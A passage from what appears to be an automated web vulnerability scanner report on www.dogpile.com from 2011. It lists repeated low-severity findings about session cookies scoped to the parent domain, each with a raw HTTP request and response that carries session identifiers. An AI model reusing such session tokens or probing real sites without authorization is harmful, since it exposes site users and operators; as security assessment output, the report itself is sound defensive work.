Path:	/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=f7359c30922a46e889b5c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:59 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/horoscope/1/4400/quickstart-6/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=f7359c30922a46e889b5c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:59 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:59 GMT
Connection: close
Content-Length: 259

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/horoscope/1/4400/quickstart-6/Relevance/iq=true/zoom=off/qlnk=1/_
...[SNIP]...

6.48. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=8e3deae18a0e4ecc8d67c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:19 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:19 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:19 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

6.49. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/termsofuse/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=995f53cbbb4c4da7993ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:23 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:23 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:23 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.50. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/tips/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6172a79eb9f246e79ad9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/tips/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.51. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_prefer/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=a9902889eb724bb4a6c8c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_prefer/ws/redir/_iceUrlFlag=11?_IceUrl=true&qkw={searchTerms} HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_prefer/ws/results/Web/%7BsearchTerms%7D/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=a9902889eb724bb4a6c8c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:50 GMT
Connection: close
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_prefer/ws/results/Web/%7BsearchTerms%7D/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7
...[SNIP]...

6.52. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/GE+Zero+Taxes

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:05 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:05 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.53. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=af5ad2b55c194ed28a4dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:58 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:58 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:58 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

6.54. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/MLB+Schedule

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:02 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:02 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com

Response

6.55. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=ca6e8004e2754a219792c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:42 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:42 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.56. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=87f215cdd6a246a69870c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:52 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/aboutresults/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=3f9553d8ae70430197ccc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.58. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=c1eb80fd75d841fcb438c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:54 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.59. http://www.dogpile.com/dogpile_rss/ws/index/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=50b69dc71f5b4e528b29c16a3af0cb01&ActionId=e35e7644240d4a61a75ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:12 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:12 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.60. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d5d171eb7a7b49f68a6ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=1e1c491665bb4188add9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:04 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:04 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:04 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.62. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=9191d9ea4ae34db9bd03c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:00 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:00 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.63. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=67d5f97c29004c7f95e7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:49 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:49 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/preferences/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.64. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2ac69a9dac404f829d51c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:48 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.65. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
